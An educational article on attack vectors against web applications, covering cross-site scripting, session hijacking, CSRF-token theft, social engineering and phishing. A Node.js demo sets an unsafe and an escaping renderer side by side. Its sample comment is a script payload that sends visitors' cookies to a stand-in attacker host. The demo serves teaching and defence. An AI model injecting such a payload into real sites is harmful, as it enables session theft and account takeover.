The world of IT security has witnessed many attack vectors against information systems. The previous article focused on vulnerabilities; this one looks at attack vectors in information security, particularly against web applications. An attack vector is the path or means by which a threat reaches and damages an information system. Some malicious payloads, such as viruses or worms, function as their own attack vector.

Attackers exploit loopholes in security controls through an attack vector. Notably, in the modern digital world attackers also exploit the human element to gain access to information and to the information and communication technology (ICT) infrastructure that holds it.

In day-to-day business, the targets range over anything attractive to a threat actor: your personal computer, your online or mobile banking account, your tablet, or you yourself, as criminals aim to harvest or steal your credentials.

Threat actors (the people employing the attack vectors) have different motivations for inflicting such damage: financial or competitive gain, bragging rights, cyber-terrorist aims, or revenge.

In web applications, attack vectors can lead to business loss or ruin a company's reputation, since the website now represents the image of the company. Individuals are not spared either, as they frequently browse the web and perform financial transactions on it.

Attack vectors against web applications mainly exploit weaknesses in input validation and output handling.

It is very difficult for developers to cover every input path perfectly, and any gap in validation or output encoding creates a risk of cross-site scripting (XSS), where attacker-supplied content is returned to other users' browsers and executed as script.

The most prevalent cross-site scripting attack against ordinary users is hijacking the individual's online account while they browse: injected script reads the session cookie and sends it to the attacker, who then presents it to the application as if they were the victim.
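As an added example (not code from the original article), the following Node.js snippet shows how a comment that is concatenated into a page unescaped becomes a cookie-stealing vector, and how encoding the value on output removes it. The comment text and the attacker.invalid host are constructed for the demonstration.

```javascript
// Added example (not from the original article): how unescaped user input
// becomes a cookie-stealing XSS vector, and how output encoding removes it.
// Runs under Node.js with no external packages.

// Constructed sample: a comment an attacker submits to a guest-book form.
// The payload tries to send the visitor's cookies to an attacker-controlled host.
const ATTACKER_COMMENT =
  "Nice site! <script>new Image().src='https://attacker.invalid/c?'+document.cookie</script>";

// Vulnerable: the application trusts the input and concatenates it into the page,
// so every visitor's browser runs the attacker's script.
function renderCommentUnsafe(comment) {
  return `<li class="comment">${comment}</li>`;
}

// Hardened: encode the characters that have meaning in an HTML text or
// attribute context before the value reaches the page. Input validation alone
// ("reject anything containing <script>") is not enough, because browsers accept
// many equivalent forms; encoding on output is the reliable fix.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}
function renderCommentSafe(comment) {
  return `<li class="comment">${escapeHtml(comment)}</li>`;
}

// Crude check used only to illustrate the difference: does the rendered
// fragment still contain a live <script> tag that a browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Demonstration
const unsafeHtml = renderCommentUnsafe(ATTACKER_COMMENT);
const safeHtml = renderCommentSafe(ATTACKER_COMMENT);
console.log('unsafe:', unsafeHtml);
console.log('safe:  ', safeHtml);
console.log('script tag survives? unsafe=%s safe=%s',
  containsScriptTag(unsafeHtml), containsScriptTag(safeHtml));
```

The escaped version still displays the attacker's text verbatim to other visitors, but as inert text rather than markup; note that a value placed inside a JavaScript block or a URL attribute needs encoding for that context instead, which is why a template engine that escapes by context is preferable to hand-rolled helpers.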

Sensitive data such as online banking details can be stolen, and attackers sometimes go as far as siphoning funds from the victim's online account without his or her knowledge.

Some web applications implement counter-measures such as anti-cross-site-request-forgery (CSRF) tokens. An attacker may then employ different techniques to gain access, for example using cross-site scripting to read the token out of the page, since script running in the page sees everything the user sees.

The human element can itself be an attack vector, through social engineering. The individuals who run corporate infrastructure need adequate and continuous training so that they are aware of current social-engineering techniques.

Awareness is the first line of defence, as an aware person is less likely to be hoodwinked into disclosing sensitive information such as passwords. Since the human is often the weakest link in the security chain, companies should educate their users not to browse untrusted websites or click links in unsolicited e-mail.

For corporate websites, even simple ones that only hold marketing information, loopholes in the web application give a threat actor a path to attack the client computers that connect to the site, for instance by serving malicious script or content to every visitor.

The visual appearance of a company website can also be changed (defaced) through cross-site scripting.

To mitigate these cross-site scripting attack vectors, companies must ensure that secure programming techniques (validating input and encoding output for the context in which it is rendered) and secure deployment practices are applied to their web applications.

User sessions can be secured by use of tokens that act as unique, unguessable identifiers, issued after login and protected from theft. Organisations that invest in IT security training are less susceptible to attacks than those that ignore user training.

It is imperative for companies to understand that a large share of successful attacks stem from human error.

An example is phishing, where the attacker exploits the human element to compromise a computer system. Phishing might be perceived as a result of weaknesses in network security; it is not, since the whole technique works by targeting users.

It is also wise to encourage users to log out of web applications before closing the browser, and to discourage them from using the same browser (or browser profile) both for financial transactions and for casual browsing, so that an open banking session is not exposed to script and links from unrelated sites.

Web application login portals can also give away credentials through shoulder surfing, the technique of standing behind someone and watching while they enter their credentials. Individuals should be wary of this.

Passwords can also be harvested with key-logger software by more sophisticated criminals, who later use the captured passwords to inflict serious damage on unsuspecting victims.

On the whole, attack vectors are exploited for selfish reasons: bragging rights, cyber-terrorist intentions, monetary gain, or revenge by former employees. Some attackers are merely curious and stumble upon information unintentionally, while others are bent on damaging organisational resources. Disgruntled employees may sabotage resources to seek revenge, while cyber terrorists want to further an ideology. The gravity of the attack depends on the motivation of the attacker. It is therefore imperative that we protect our web applications, so as to keep pace with current global trends and stay "secure".
